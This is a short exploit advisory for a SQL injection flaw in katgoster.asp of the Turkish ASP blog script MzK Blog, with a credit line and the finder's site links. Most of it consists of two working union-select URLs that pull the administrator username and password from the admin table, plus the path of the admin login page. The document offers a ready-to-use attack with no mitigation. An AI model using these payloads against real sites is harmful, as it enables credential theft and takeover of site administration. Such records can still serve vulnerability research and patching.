MzK Blog suffers from a SQL injection vulnerability in katgoster.asp.
a9bababfe56c0450554ad72b016fdf4c8f2590a20b6fa92e64f3fa6c0e7da067
MzK Blog (tr)) SQL Injection Vuln
#Software: MzK Blog (tr)
#download: http://www.aspindir.com/goster/5013
#demo: http://www.karahanbilgisayar.com/blog/
#Found By: GeFORC3 | G3
#Exploit:
http://site.com/script_path/katgoster.asp?katID=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
http://site.com/script_path/katgoster.asp?katID=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin
adminpanel:
/login.asp
WwW.GeFORC3.Org | WwW.HeykirBlog.Org | WwW.NetKaBus.Com